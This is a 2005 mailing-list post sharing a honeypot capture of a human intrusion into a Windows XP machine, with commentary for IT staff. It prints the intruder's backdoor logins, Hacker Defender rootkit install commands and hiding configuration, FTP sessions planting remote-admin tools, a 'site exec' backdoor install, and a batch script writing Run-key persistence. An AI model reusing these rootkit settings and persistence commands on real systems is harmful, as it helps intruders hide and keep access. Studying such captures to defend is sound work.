[Intrusions] Hacker Tools/Hacker Defender Packet Capture
David Taylor
ltr at isc.upenn.edu
Tue Mar 15 10:13:19 GMT 2005
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hi all,
I setup a VMWare Windows XP SP1(fully patched) machine with weak
passwords and decreased security settings in the hopes of capturing
some traffic from a human unauthorized intrusion. I got lucky this
weekend and captured some really interesting stuff. I thought some
of you out there may find this interesting. Some of you have
probably already done this, yourself. I shared this with the IT
community at UPENN and they seemed to like it and found it useful so
I figured I would forward to all of you.
I created a spreadsheet and matched up the services/processes of the
'before hacker defender and after hacker defender". If you want to
download from my site the link is included in the message below. I
couldn't find a better way to show the data than using a spreadsheet
which some might feel uncomfortable opening.
Network Chemistry 'Packetyzer' was used to extract the sessions seen
below.
>>>Original Message sent to UPENN IT staff<<<
I tried to send the attachment numerous ways but it kept getting
blocked by the list serv software (not anti-virus software) =). I
have put the spreadsheet on my personal site where you can download
it if you like.
http://www.hackerblaster.com/hackerdefender.xls
If you don't feel comfortable downloading it from my site but still
want to see the spreadsheet reply to me and I will send it to you
directly.
- -
- ----------------------------------------------------------------------
- - --
This weekend I was lucky enough to capture a great hack session. The
intruder broke in using the Guest account (Guest had increased
privileges) of my vmware honeypot and planted several hacking tools
(Dameware, RAdmin, Serv-U FTP and Hacker Defender). They also
attempted to run a security template but the script wasn't modified
properly for it to work.
Some of you may already understand how all of this works but some may
not. When I was a sysadmin I always hated it when a computer on my
network got hacked but even worse was that I could never tell what
they were doing. I was finding compromised machines and everything
was totally hidden. It was kind of a mystery to me exactly what they
did when they were inside. I always wished I could catch them in the
act and watch their every move.
I have a VMWare workstation setup (Virtual Machine that houses a real
Operating system such as Windows or Linux) running Windows XP
Professional SP 1 fully patched. I have IPSEC policies setup to
prevent the machine from scanning other networks for commonly scanned
ports (135, 139, 445, SQL, etc) in the event an intruder tries to do
so. I also closely monitor this system just in case. The passwords
on the Guest and Administrator account are guess-able by the most
popular scanning/cracking tools.
Below you will find readable text that was extracted from the full
packet capture I performed during this unauthorized intrusion. I will
try and explain what I see as best as I can without going into geeky
technical details. Those that want more information about this reply
to me directly. I felt it was important to share this with you all
so that you can see what happens as well.
Some of this might not make sense but you are seeing it as I see it.
This is not in chronological order. There were over 20,000 packets to
sift through.
- - -LINKS-
These links may help you better understand the tools below.
Hacker Defender Home
Main page is a discussion on this software. Very interesting
No, they don't have a link for you to download it. =)
This software is 'not' for legitimate use and is pure evil.
http://hxdef.czweb.org/
Remote Admin
Legitimate remote control software often misused by hackers
http://www.radmin.com/
Dameware NT Utilities
Legitimate remote control software often misused by hackers
http://www.dameware.com/
Serv-U Ftp Server
Legitimate FTP server software often misused by hackers
http://www.serv-u.com/
*|*| Capture of the hacker installing Hacker Defender to hide
processes and services.
*|*| This is actually the most exciting thing I observed. Refer to
the spreadsheet. Left Column is before Hacker Defender was installed
and the right column is after it was installed. I was also running a
NETSTAT at the same time this was going on and noticed the connection
from the IP address of the intruder totally disappeared. The IP
address was still generating traffic, however. So, it hid the
services, processes, registry entries and connections that were tied
to the rogue software.
/////////Run Hacker Defender////////
Below the intruder logged into the honeypot via what appears to be
one of the backdoors installed. Not sure which one. A username and
password is entered and a remote command prompt appears on the
intruder's screen. The intruder then types in NET START to get a
list of current running services and he sees his /her services
running. The intruder then stops the Remote Admin (r_server) program
(used to remotely access a system to control it) and then restarts
it. Then the intruder uses FPORT (which was planted earlier by the
intruder) and gets a list of current process-to-port mappings. All
Services and Processes are showing up normally. The intruder then
runs updmgr.exe (Hacker Defender) and then issues the same commands
as earlier. The processes the intruder planted are now hidden.
I don't see any reason to hide the username/passwords here. My guess
is most of you don't log into backdoors often. =)
(*) indicates hacker tools services
......Login:......anlx
Password:......yopyop
- - -rw-rwMicrosoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>......net start
net start
......These Windows services are started:
Automatic Updates
COM+ Event System
COM+ System Application
Cryptographic Services
DHCP Client
Distributed Link Tracking Client
Distributed Transaction Coordinator
DNS Client
Error Reporting Service
Event Log
Fast User Switching Compatibility
FTP Publishing
IIS Admin
IPSEC Services
Logical Disk Manager
Messenger
(*)ms-off ExportTool
Network Connections
Network Location Awareness (NLA)
Plug and Play
Portable Media Serial Number
Print Spooler
Protected Storage
(*)RCP SHELL
(*)Remote Administrator Service
Remote Procedure Call (RPC)
Remote Registry
Secondary Logon
Security Accounts Manager
Server
Shell Hardware Detection
Simple Mail Transfer Protocol (SMTP)
SNMP Service
SSDP Discovery Service
System Event Notification
System Restore Service
Task Scheduler
TCP/IP NetBIOS Helper
Terminal Services
Themes
VMware Tools Service
WebClient
Windows Audio
Windows Management Instrumentation
Windows Time
Wireless Zero Configuration
Workstation
World Wide Web Publishing
The command completed successfully.
C:\WINDOWS\system32>......net stop r_server
net stop r_server
......The Remote Administrator Service service is stopping.........V
........
The Remote Administrator Service service was stopped successfully.
......
C:\WINDOWS\system32>......net start r_server
net start r_server
......The Remote Administrator Service service is starting.......
The Remote Administrator Service service was started successfully.
......
C:\WINDOWS\system32>......cd dllcache
cd dllcache
......
C:\WINDOWS\system32\dllcache>......cd..
cd..
w......
C:\WINDOWS\system32>......fport.exe
fport.exe
......FPort v2.0 - TCP/IP Process to Port Mapper
Copyright 2000 by Foundstone, Inc.
http://www.foundstone.com
(*) indicates hacker tool port/processes
Pid Process Port Proto Path
1720 inetinfo -> 21 TCP
C:\WINDOWS\System32\inetsrv\inetinfo.exe
1720 inetinfo -> 25 TCP
C:\WINDOWS\System32\inetsrv\inetinfo.exe
1720 inetinfo -> 80 TCP
C:\WINDOWS\System32\inetsrv\inetinfo.exe
876 svchost -> 135 TCP C:\WINDOWS\system32\svchost.exe
4 System -> 139 TCP
1720 inetinfo -> 443 TCP
C:\WINDOWS\System32\inetsrv\inetinfo.exe
4 System -> 445 TCP
988 svchost -> 1025 TCP C:\WINDOWS\System32\svchost.exe
1720 inetinfo -> 1026 TCP
C:\WINDOWS\System32\inetsrv\inetinfo.exe
3064 msdtc -> 1051 TCP C:\WINDOWS\System32\msdtc.exe
0 System -> 1233 TCP
988 svchost -> 3389 TCP C:\WINDOWS\System32\svchost.exe
(*)3792 mplayer -> 4899 TCP C:\Program Files\Windows
Media
Player\mplayer.exe
1148 svchost -> 5000 TCP C:\WINDOWS\System32\svchost.exe
(*)3456 Tasks -> 19515 TCP C:\WINDOWS\system32\Tasks.exe
(*)3456 Tasks -> 38303 TCP C:\WINDOWS\system32\Tasks.exe
(*)2984 outlook -> 65446 TCP c:\program files\outlook
express\outlook.exe
(*)3792 mplayer -> 123 UDP C:\Program Files\Windows
Media
Player\mplayer.exe
3064 msdtc -> 123 UDP C:\WINDOWS\System32\msdtc.exe
1720 inetinfo -> 135 UDP
C:\WINDOWS\System32\inetsrv\inetinfo.exe
1148 svchost -> 137 UDP C:\WINDOWS\System32\svchost.exe
(*)3456 Tasks -> 138 UDP C:\WINDOWS\system32\Tasks.exe
1720 inetinfo -> 161 UDP
C:\WINDOWS\System32\inetsrv\inetinfo.exe
1720 inetinfo -> 445 UDP
C:\WINDOWS\System32\inetsrv\inetinfo.exe
876 svchost -> 500 UDP C:\WINDOWS\system32\svchost.exe
1720 inetinfo -> 1027 UDP
C:\WINDOWS\System32\inetsrv\inetinfo.exe
4 System -> 1031 UDP
988 svchost -> 1034 UDP C:\WINDOWS\System32\svchost.exe
(*)2984 outlook -> 1900 UDP c:\program files\outlook
express\outlook.exe
988 svchost -> 1900 UDP C:\WINDOWS\System32\svchost.exe
1720 inetinfo -> 3456 UDP
C:\WINDOWS\System32\inetsrv\inetinfo.exe
......
C:\WINDOWS\system32>............cd dllcache
cd dllcache
......
C:\WINDOWS\system32\dllcache>......updmgr.exe -:installonly
updmgr.exe -:installonly
......
C:\WINDOWS\system32\dllcache>......updmgr.exe -:refresh
updmgr.exe -:refresh
......
C:\WINDOWS\system32\dllcache>......net start updmgr
net start updmgr
......The Automatic Updates Manager service is starting.......
The Automatic Updates Manager service was started successfully.
......
C:\WINDOWS\system32\dllcache>......net start
net start
......These Windows services are started:
Automatic Updates
COM+ Event System
COM+ System Application
Cryptographic Services
DHCP Client
Distributed Link Tracking Client
Distributed Transaction Coordinator
DNS Client
Error Reporting Service
Event Log
Fast User Switching Compatibility
FTP Publishing
IIS Admin
IPSEC Services
Logical Disk Manager
Messenger
Network Connections
Network Location Awareness (NLA)
Plug and Play
Portable Media Serial Number
Print Spooler
Protected Storage
Remote Procedure Call (RPC)
Remote Registry
Secondary Logon
Security Accounts Manager
Server
Shell Hardware Detection
Simple Mail Transfer Protocol (SMTP)
SNMP Service
SSDP Discovery Service
System Event Notification
System Restore Service
Task Scheduler
TCP/IP NetBIOS Helper
Terminal Services
Themes
VMware Tools Service
WebClient
Windows Audio
Windows Management Instrumentation
Windows Time
Wireless Zero Configuration
Workstation
World Wide Web Publishing
The command completed successfully.
C:\WINDOWS\system32\dllcache>......cd..
cd..
W......
C:\WINDOWS\system32>......fport.exe
fport.exe
......FPort v2.0 - TCP/IP Process to Port Mapper
Copyright 2000 by Foundstone, Inc.
http://www.foundstone.com
Pid Process Port Proto Path
1720 inetinfo -> 21 TCP
C:\WINDOWS\System32\inetsrv\inetinfo.exe
1720 inetinfo -> 25 TCP
C:\WINDOWS\System32\inetsrv\inetinfo.exe
1720 inetinfo -> 80 TCP
C:\WINDOWS\System32\inetsrv\inetinfo.exe
876 svchost -> 135 TCP C:\WINDOWS\system32\svchost.exe
4 System -> 139 TCP
1720 inetinfo -> 443 TCP
C:\WINDOWS\System32\inetsrv\inetinfo.exe
4 System -> 445 TCP
988 svchost -> 1025 TCP C:\WINDOWS\System32\svchost.exe
1720 inetinfo -> 1026 TCP
C:\WINDOWS\System32\inetsrv\inetinfo.exe
3064 msdtc -> 1051 TCP C:\WINDOWS\System32\msdtc.exe
0 System -> 1233 TCP
0 System -> 1236 TCP
988 svchost -> 3389 TCP C:\WINDOWS\System32\svchost.exe
1148 svchost -> 5000 TCP C:\WINDOWS\System32\svchost.exe
3064 msdtc -> 123 UDP C:\WINDOWS\System32\msdtc.exe
1148 svchost -> 123 UDP C:\WINDOWS\System32\svchost.exe
1720 inetinfo -> 135 UDP
C:\WINDOWS\System32\inetsrv\inetinfo.exe
4 System -> 137 UDP
4 System -> 138 UDP
1720 inetinfo -> 161 UDP
C:\WINDOWS\System32\inetsrv\inetinfo.exe
1720 inetinfo -> 445 UDP
C:\WINDOWS\System32\inetsrv\inetinfo.exe
876 svchost -> 500 UDP C:\WINDOWS\system32\svchost.exe
1720 inetinfo -> 1027 UDP
C:\WINDOWS\System32\inetsrv\inetinfo.exe
4 System -> 1031 UDP
988 svchost -> 1034 UDP C:\WINDOWS\System32\svchost.exe
0 System -> 1900 UDP
988 svchost -> 1900 UDP C:\WINDOWS\System32\svchost.exe
1720 inetinfo -> 3456 UDP
C:\WINDOWS\System32\inetsrv\inetinfo.exe
......
C:\WINDOWS\system32>......exit
exit
C.=...................Rz.
*|*| Hacker Defender .INI file
......-rw-rw[">"">>""H<<<">>>idden T>>a>"ble]
>>"">>h>"">>xd>"">>ef>"">>100.exe
>>"">>h>"">>xd>"">>ef>"">>100.ini
r_server*
radmin*
AdmDll.dll
raddrv.dll
radmin.reg
instal.bat
mplayer.exe
outlook.exe
systemspool.dll
windowsshells32.dll
Tasks.exe
DWRCS*
DNTUS26.EXE
restore
lol
updmgr.exe
updmgr.ini
updmgr*
""[:"\:R":o:o\:t: :P:r>:o:c<:e:"s:s:"e<:s":>]
/[/H/idd\en Ser:vi"ces]
Ha>:ck"er//Def\ender*
HXD Service 100
DameWare*
DNTUS26
DWMRCS
UpdMgr
Automatic Updates Manager
r_server
Remote Administrator Service
Windows Media Player
ms-off
ms-off*
Server Management
rpcxshell
RCP SHELL
Outlook
[Hi:dden R/">>egKeys]
UpdMgr
LEGACY_UpdMgr
UpdMgrDrv
LEGACY_UpdMgrDrv
/
\"[Hid:den\> :RegValues]"""
////
:[St/\artup\ Run/]
":[\Fr<ee>> S:"<pa>ce]
"[>H<i>d"d:en<>\ P/:or:t<s"]\:
TCP:19515,38303,4899,65446
UDP:19515,38303,4899,65446
[Set/tin/:\gs] /
P:assw\ord=yopyop
Ba:ckd:"oor"Shell=hxdef.$.exe
Fil:eMappin\gN/ame=_.-=[UpdMgr]=-._
Serv:iceName=UpdMgr
>Se|rvi:ceDisp<://la"yName=Automatic Updates Manager
Ser>vic:eD||escr<ip:t"ion=provides Automatic Windows Updates
Dri<ve\rN:ame=UpdMgrDrv
D:riv>erFileNam/e=updmgrsvc.sys-rw-rw......-rw-rw
*Serv-U was logged into by the attacker
............220 Serv-U FTP Server v3.0 for WinSock ready...
AUTH M
530 Not logged in.
USER admin
331 User name okay, need password.
PASS lol
230 User logged in, proceed.
SITE MAINTENANCE
230-Switching to SYSTEM MAINTENANCE mode.
......230 Version=1
900-Type=Status
900 Server=Online
900-Type=License
900-DaysLeft=2986
900-Status=KeyValid
900-CurAccounts=1
900-MaxAccounts=-1
900-CurDomains=1
900-MaxDomains=-1
900-MaxNrUsers=-1
900-VirPath=1
900-DiskQuota=1
900-Ratios=1
900-RemoteAdmin=1
900-Version=3.0.0.17
900-RegistrationKey=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAagAAAyQnyD
5CDgL/DmNob3VwQGNob3Vwc3NzBG15bmULocalSetupPassword=072C63105200180D5C
07170A7E3E
900-User=choup at choupsss
900-EMail=myne
900-Reseller=
900-Time=1053304612
900-Type=65282
900-Size=1
900-Days=3650
900-MajorVersion=3
900 MinorVersion=0
GETDOMAINLIST
200 Domain=FuCkYoUaLL|0.0.0.0|19515|1|1|0|1
GETSTATUSINFO
200-StatBandwidth=45
......200-StatMaxSockets=32767
200-StatCurSockets=3
200-StatTransfers=0
200-StatMaxUsers=-1
200-StatTotalUsers=1
200 StatAnonUsers=0
...... GETSERVERSETUP
200-Security=1
......200-AntiHammer=0
200-EncryptPasswords=1
200-CheckAnonPass=0
200-DeletePartialUploads=0
200-LowerCaseFileDir=0
200-BlockAntiTimeOut=0
200-BlockFTPBounceAttack=0
200-DirCacheEnable=1
200-PacketTimeOutDynamic=1
200-SocketInlineOOB=0
200-SocketKeepAlive=0
200-SocketNoNagle=0
200-PASVPortStart=0
200-PASVPortRange=0
200-MaxNrUsers=-1
200-DirCacheSize=25
200-DirCacheTime=600
200-OpenFilesUploadMode=0
200-OpenFilesDownloadMode=0
200-AntiHammerWindow=30
200-AntiHammerTries=4
200-AntiHammerBlock=300
200-SocketRcvBuffer=65535
200-SocketSndBuffer=65535
200-PacketTimeOut=300
200-SpeedLimit=1536000
200 DirListMask=rw-rw-rw-
GETDIRCACHEINFO
200 CacheHitRatio=0
...... GETSTATUSINFO
200-StatBandwidth=45
......200-StatMaxSockets=32767
200-StatCurSockets=3
200-StatTransfers=0
200-StatMaxUsers=-1
200-StatTotalUsers=1
200 StatAnonUsers=0
...... GETSTATUSINFO
200-StatBandwidth=45
......200-StatMaxSockets=32767
200-StatCurSockets=3
200-StatTransfers=0
200-StatMaxUsers=-1
200-StatTotalUsers=1
200 StatAnonUsers=0
...... GETSTATUSINFO
200-StatBandwidth=0
......200-StatMaxSockets=32767
200-StatCurSockets=3
200-StatTransfers=0
200-StatMaxUsers=-1
200-StatTotalUsers=1
200 StatAnonUsers=0
- - -SETSERVERSETUP
<2....-SpeedLimit=-1
- - -MaxNrUsers=-1
- - -AntiHammerTries=4
- - -AntiHammerWindow=30
- - -AntiHammerBlock=300
- - -AntiHammer=0
- - -EncryptPasswords=1
- - -CheckAnonPass=0
- - -DeletePartialUploads=0
- - -LowerCaseFileDir=0
- - -BlockAntiTimeOut=0
- - -BlockFTPBounceAttack=0
- - -DirCacheEnable=1
- - -DirCacheSize=25
- - -DirCacheTime=600
- - -OpenFilesUploadMode=0
- - -OpenFilesDownloadMode=0
- - -SocketRcvBuffer=65535
- - -SocketSndBuffer=65535
- - -PacketTimeOut=300
- - -Security=1
- - -PacketTimeOutDynamic=1
- - -SocketInlineOOB=0
- - -SocketKeepAlive=1
- - -SocketNoNagle=1
- - -DirListMask=rw-rw-rw-
- - -PASVPortStart=0
- - -PASVPortRange=0
- - -CertCommon=
- - -CertEmail=
- - -CertCity=
- - -CertState=
- - -CertCountry=
- - -CertOrganization=
CertOrgUnit=
220 Server settings saved
...... GETSTATUSINFO
200-StatBandwidth=0
......200-StatMaxSockets=32767
200-StatCurSockets=3
200-StatTransfers=0
200-StatMaxUsers=-1
200-StatTotalUsers=1
200 StatAnonUsers=0
*|*|Capture of FTP commands
Here the intruder is testing out the directories (from a different ip
address than the original attacker). You can see the famous
C:\RECYCLER and C:\System Volume Information folders. It seems that
they uploaded a test file to the vmware honeypot to do a speed test.
T........
..220 Serv-U FTP Server v3.0 for WinSock ready...
USER admin
331 User name okay, need password.
PASS lol
230 User logged in, proceed.
SYST
215 UNIX Type: L8
FEAT
500 'FEAT': command not understood.
PWD
257 "/c:" is current directory.
TYPE A
200 Type set to A.
PASV
227 Entering Passive Mode (0,0,0,0,4,172) (ip cleansed)
S.....LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
S.....CWD RECYCLER
250 Directory changed to /c:/RECYCLER
PWD
257 "/c:/RECYCLER" is current directory.
PASV
227 Entering Passive Mode (0,0,0,0,4,173)
S.....LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
S.....SIZE 05MB
550 /c:/RECYCLER/05MB: No such file.
S.....TYPE I
200 Type set to I.
S.....PORT second-intruder-ip,162,108
200 PORT Command successful.
STOR 05MB
150 Opening BINARY mode data connection for 05MB.
S.....226 Transfer complete.
S.....TYPE A
200 Type set to A.
PASV
227 Entering Passive Mode (0,0,0,0,4,174)
S.....LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
S.....DELE 05MB
250 DELE command successful.
PASV
227 Entering Passive Mode (0,0,0,0,4,175)
S.....LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
S.....CDUP
250 Directory changed to /c:
PWD
257 "/c:" is current directory.
S.....CWD Program Files
250 Directory changed to /c:/Program Files
PWD
257 "/c:/Program Files" is current directory.
PASV
227 Entering Passive Mode (0,0,0,0,4,176)
S.....LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
S.....CWD Windows Media Player
250 Directory changed to /c:/Program Files/Windows Media Player
PWD
257 "/c:/Program Files/Windows Media Player" is current directory.
PASV
227 Entering Passive Mode (0,0,0,0,4,177)
M.....LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
M.....TYPE I
200 Type set to I.
SIZE AdmDll.dll
550 /c:/Program Files/Windows Media Player/AdmDll.dll: No such file.
PASV
227 Entering Passive Mode (0,0,0,0,4,178)
STOR AdmDll.dll
150 Opening BINARY mode data connection for AdmDll.dll.
M.....226 Transfer complete.
TYPE A
200 Type set to A.
SIZE Instal.bat
550 /c:/Program Files/Windows Media Player/Instal.bat: No such file.
PASV
227 Entering Passive Mode (0,0,0,0,4,179)
M.....STOR Instal.bat
150 Opening ASCII mode data connection for Instal.bat.
226 Transfer complete.
M.....TYPE I
200 Type set to I.
SIZE mplayer.exe
550 /c:/Program Files/Windows Media Player/mplayer.exe: No such file.
PASV
227 Entering Passive Mode (0,0,0,0,4,180)
STOR mplayer.exe
150 Opening BINARY mode data connection for mplayer.exe.
L.....226 Transfer complete.
L.....SIZE raddrv.dll
550 /c:/Program Files/Windows Media Player/raddrv.dll: No such file.
PASV
227 Entering Passive Mode (0,0,0,0,4,182)
L.....STOR raddrv.dll
150 Opening BINARY mode data connection for raddrv.dll.
L.....226 Transfer complete.
L.....SIZE radmin.reg
550 /c:/Program Files/Windows Media Player/radmin.reg: No such file.
PASV
227 Entering Passive Mode (0,0,0,0,4,183)
L.....STOR radmin.reg
150 Opening BINARY mode data connection for radmin.reg.
226 Transfer complete.
L.....L.....TYPE A
200 Type set to A.
PASV
227 Entering Passive Mode (0,0,0,0,4,184)
LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
L.....CDUP
250 Directory changed to /c:/Program Files
PWD
257 "/c:/Program Files" is current directory.
F.....CWD Outlook Express
250 Directory changed to /c:/Program Files/Outlook Express
PWD
257 "/c:/Program Files/Outlook Express" is current directory.
PASV
227 Entering Passive Mode (0,0,0,0,4,186)
F.....LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
F.....TYPE I
200 Type set to I.
SIZE outlook.exe
550 /c:/Program Files/Outlook Express/outlook.exe: No such file.
PASV
227 Entering Passive Mode (0,0,0,0,4,187)
F.....STOR outlook.exe
150 Opening BINARY mode data connection for outlook.exe.
F.....226 Transfer complete.
TYPE A
200 Type set to A.
200 Type set to A.
PASV
227 Entering Passive Mode (0,0,0,0,4,188)
LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
F.....site exec outlook.exe /u anlx /pw yopyop /p 65446 /install
200-St200 EXEC command successful (TID=33).
F.....site exec net start rpcxshell
200 EXEC command successful (TID=33).
F.....PASV
227 Entering Passive Mode (0,0,0,0,4,189)
LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
E.....CWD /c:/
250 Directory changed to /c:
PWD
257 "/c:" is current directory.
E.....CWD /e:/
250 Directory changed to /e:
PWD
257 "/e:" is current directory.
PASV
227 Entering Passive Mode (0,0,0,0,4,190)
E.....LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
E.....CWD System Volume Information
250 Directory changed to /e:/System Volume Information
PWD
257 "/e:/System Volume Information" is current directory.
PASV
227 Entering Passive Mode (0,0,0,0,4,191)
E.....LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
E.....CWD _restore{08813AA2-64F0-4666-9648-E10E0A8DEA02}
250 Directory changed to /e:/System Volume
Information/_restore{08813AA2-64F0-4666-9648-E10E0A8DEA02}
PWD
257 "/e:/System Volume
Information/_restore{08813AA2-64F0-4666-9648-E10E0A8DEA02}" is
current
directory.
PASV
227 Entering Passive Mode (0,0,0,0,4,192)
LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
?.....CDUP
250 Directory changed to /e:/System Volume Information
PWD
257 "/e:/System Volume Information" is current directory.
?.....CDUP
250 Directory changed to /e:
PWD
257 "/e:" is current directory.
?.....CWD RECYCLER
250 Directory changed to /e:/RECYCLER
PWD
257 "/e:/RECYCLER" is current directory.
PASV
227 Entering Passive Mode (0,0,0,0,4,193)
?.....LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
?.....CWD S-1-5-21-1960408961-1409082233-1417001333-1001
250 Directory changed to
/e:/RECYCLER/S-1-5-21-1960408961-1409082233-1417001333-1001
PWD
257 "/e:/RECYCLER/S-1-5-21-1960408961-1409082233-1417001333-1001" is
current directory.
PASV
227 Entering Passive Mode (0,0,0,0,4,194)
>.....LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
>.....CDUP
250 Directory changed to /e:/RECYCLER
PWD
257 "/e:/RECYCLER" is current directory.
>.....CDUP
250 Directory changed to /e:
PWD
257 "/e:" is current directory.
>.....CWD /c:/
250 Directory changed to /c:
PWD
257 "/c:" is current directory.
>.....CWD WINDOWS
250 Directory changed to /c:/WINDOWS
PWD
257 "/c:/WINDOWS" is current directory.
PASV
227 Entering Passive Mode (0,0,0,0,4,195)
>.....LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
>.....CWD system32
250 Directory changed to /c:/WINDOWS/system32
PWD
257 "/c:/WINDOWS/system32" is current directory.
PASV
227 Entering Passive Mode (0,0,0,0,4,196)
>.....LIST -al
150 Opening ASCII mode data connection for /bin/ls.
8.....226 Transfer complete.
8.....CWD dllcache
250 Directory changed to /c:/WINDOWS/system32/dllcache
PWD
257 "/c:/WINDOWS/system32/dllcache" is current directory.
PASV
227 Entering Passive Mode (0,0,0,0,4,197)
8.....LIST -al
...h.S150 Opening ASCII mode data connection for /bin/ls.
8.....226 Transfer complete.
226 Transfer complete.
8.....TYPE I
200 Type set to I.
SIZE updmgr.exe
550 /c:/WINDOWS/system32/dllcache/updmgr.exe: No such file.
PASV
227 Entering Passive Mode (0,0,0,0,4,198)
STOR updmgr.exe
150 Opening BINARY mode data connection for updmgr.exe.
8.....226 Transfer complete.
TYPE A
200 Type set to A.
SIZE updmgr.ini
550 /c:/WINDOWS/system32/dllcache/updmgr.ini: No such file.
PASV
227 Entering Passive Mode (0,0,0,0,4,199)
8.....STOR updmgr.ini
150 Opening ASCII mode data connection for updmgr.ini.
226 Transfer complete.
8.....8.....PASV
227 Entering Passive Mode (0,0,0,0,4,200)
8.....LIST -al
- - -rw-rw150 Opening ASCII mode data connection for /bin/ls.
8.....226 Transfer complete.
226 Transfer complete.
8.....SIZE updmgr.ini
213 1203
PASV
227 Entering Passive Mode (0,0,0,0,4,201)
8.....RETR updmgr.ini
150 Opening ASCII mode data connection for updmgr.ini (1203 bytes).
226 Transfer complete.
8.....CWD /c:/WINDOWS/temp
250 Directory changed to /c:/WINDOWS/Temp
PWD
257 "/c:/WINDOWS/Temp" is current directory.
PASV
227 Entering Passive Mode (0,0,0,0,4,202)
8.....LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
7.....SIZE run.bat
550 /c:/WINDOWS/Temp/run.bat: No such file.
PASV
227 Entering Passive Mode (0,0,0,0,4,203)
7.....STOR run.bat
150 Opening ASCII mode data connection for run.bat.
226 Transfer complete.
7.....SIZE ipcsec.bat
550 /c:/WINDOWS/Temp/ipcsec.bat: No such file.
PASV
227 Entering Passive Mode (0,0,0,0,4,204)
2.....STOR ipcsec.bat
150 Opening ASCII mode data connection for ipcsec.bat.
2.....226 Transfer complete.
2.....PASV
227 Entering Passive Mode (0,0,0,0,4,205)
2.....LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
1.....CDUP
250 Directory changed to /c:/WINDOWS
PWD
257 "/c:/WINDOWS" is current directory.
1.....CDUP
250 Directory changed to /c:
PWD
257 "/c:" is current directory.
1.....PASV
227 Entering Passive Mode (0,0,0,0,4,206)
1.....LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
1.....CDUP
250 Directory changed to /c:
PWD
257 "/c:" is current directory.
1.....CWD /c:/windows/system32
250 Directory changed to /c:/WINDOWS/system32
PWD
257 "/c:/WINDOWS/system32" is current directory.
1.....TYPE I
200 Type set to I.
SIZE fport.exe
550 /c:/WINDOWS/system32/fport.exe: No such file.
PASV
227 Entering Passive Mode (0,0,0,0,4,207)
1.....STOR fport.exe
150 Opening BINARY mode data connection for fport.exe.
1.....226 Transfer complete.
1.....SIZE kill.exe
550 /c:/WINDOWS/system32/kill.exe: No such file.
PASV
227 Entering Passive Mode (0,0,0,0,4,208)
1.....STOR kill.exe
150 Opening BINARY mode data connection for kill.exe.
1.....226 Transfer complete.
1.....TYPE A
200 Type set to A.
PASV
227 Entering Passive Mode (0,0,0,0,4,209)
LIST -al
150 Opening ASCII mode data connection for /bin/ls.
LIST -al
150 Op1.....226 Transfer complete.
1.....CWD dllcache
250 Directory changed to /c:/WINDOWS/system32/dllcache
PWD
257 "/c:/WINDOWS/system32/dllcache" is current directory.
PASV
227 Entering Passive Mode (0,0,0,0,4,212)
LIST -al
150 Opening ASCII mode data connection for /bin/ls.
1.....226 Transfer complete.
226 Transfer complete.
1.....PASV
227 Entering Passive Mode (0,0,0,0,4,213)
+.....LIST -al
.#..uk150 Opening ASCII mode data connection for /bin/ls.
+.....226 Transfer complete.
+.....CWD /c:/
250 Directory changed to /c:
PWD
257 "/c:" is current directory.
+.....CWD /e:/
250 Directory changed to /e:
PWD
257 "/e:" is current directory.
+.....CWD RECYCLER
250 Directory changed to /e:/RECYCLER
PWD
257 "/e:/RECYCLER" is current directory.
+.....CDUP
250 Directory changed to /e:
PWD
257 "/e:" is current directory.
+.....CWD System Volume Information
250 Directory changed to /e:/System Volume Information
PWD
257 "/e:/System Volume Information" is current directory.
+.....MKD restore
257 "/e:/System Volume Information/restore" directory created.
PWD
257 "/e:/System Volume Information" is current directory.
PASV
227 Entering Passive Mode (0,0,0,0,4,214)
*.....LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
*.....CWD /e:/
250 Directory changed to /e:
PWD
257 "/e:" is current directory.
*.....QUIT
221 Goodbye!
*......'.;.%..4.."*.....
*|*|Attempted to run a security template - This is also seen in some
advanced worms out there. They have the path wrong in the script so
it failed. What they are trying to do here is 'secure' the
workstation so that other hackers can't break into it. They also set
the port number for the Microsoft Telnet Service to 81 and restart it
to take effect.
Contents of C:\WINDOWS\IPCSEC.BAT
cd\
echo [ IPC OFF by Kamui ]
echo.
echo [Auto-delete IPC Share ]
echo.
echo @REGEDIT4>>root.reg
echo
@[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>r
oot.reg
echo @"NetworkStartup"="net share IPC$ /delete /yes">>root.reg
echo @"Secure"="net share ADMIN$ /delete /yes">>root.reg
echo @"Secure1"="net share C$ /delete /yes">>root.reg
echo @"Secure2"="net share D$ /delete /yes">>root.reg
@regedit /S root.reg
@del root.reg
echo.
echo @REGEDIT4 >> roots.reg
echo @[HKEY_LOCAL_MACHINE\Software\Microsoft\TelnetServer \1.0\]
>> roots.reg
echo @"NTLM"=dword:00000000 >> roots.reg
echo @"TelnetPort"=dword:00000051 >> roots.reg
echo @[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\T lntSvr\]
>> roots.reg
echo @"Start"=dword:00000002 >> roots.reg
